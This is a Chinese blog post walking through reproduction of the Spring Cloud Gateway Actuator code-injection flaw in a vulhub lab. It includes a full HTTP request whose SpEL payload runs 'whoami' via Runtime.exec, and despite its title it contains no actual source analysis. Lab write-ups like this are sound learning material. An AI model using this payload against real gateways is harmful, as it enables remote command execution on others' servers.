SpringCloud?Gateway远程命令执行漏洞源码分析
这篇文章主要讲解了“SpringCloudGateway远程命令执行漏洞源码分析”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“SpringCloudGateway远程命令执行漏洞源码分析”吧!
漏洞描述
使用Spring Cloud Gateway的应用程序在Actuator端点启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可以恶意创建允许在远程主机上执行任意远程执行的请求。
当攻击者可以访问actuator API时,就可以利用该漏洞执行任意命令。
影响范围
Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
Spring Cloud Gateway 其他已不再更新的版本
环境搭建
漏洞环境搭建,采用vulhub,搭建方法,自行搜索。
搭建成功后,访问一下
漏洞复现
1.查看actuator端点是开启的
抓包,并修改接口为/actuator
2. 查看/actuator/gateway/routes
返回的路由信息,意思是当访问index时,路由到example:80
3.创建路由
POST/actuator/gateway/routes/testHTTP/1.1Host:192.168.10.171:8080User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64;rv:94.0)Gecko/20100101Firefox/94.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language:zh,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding:gzip,deflateConnection:closeUpgrade-Insecure-Requests:1If-Modified-Since:Thu,17Oct202307:18:26GMTIf-None-Match:"3147526947"Cache-Control:max-age=0Content-Type:application/jsonContent-Length:431{"id":"test","filters":[{"name":"AddResponseHeader","args":{"value":"#{newjava.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(newString[]{\"whoami\"}).getInputStream()))}","name":"cmd"}}],"uri":"example:80","order":0}
4.刷新路由
5.访问创建的路由
6.删除路由
7.再次刷新路由
8.然后,访问该路由,发现路由已被删除
感谢各位的阅读,以上就是“SpringCloudGateway远程命令执行漏洞源码分析”的内容了,经过本文的学习后,相信大家对SpringCloudGateway远程命令执行漏洞源码分析这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是主机评测网,小编将为大家推送更多相关知识点的文章,欢迎关注!
上一篇:Reactor模型如何实现
下一篇:Pandas?merge怎么合并两个DataFram
输入法切换键是哪个键?输入法切
冬月是哪一个月?冬月是什么意思
个人所得税退税金额怎么算出来的
输入法全角和半角有什么区别?输
a4纸尺寸是多少厘米?a4纸的由来
个人所得税扣除标准?个人所得税
输入法哪个好用?输入法介绍
卡拉OK是哪个国家发明的?卡拉OK
mikutools原神网页版入口链接?m
关机特别慢什么原因?电脑和手机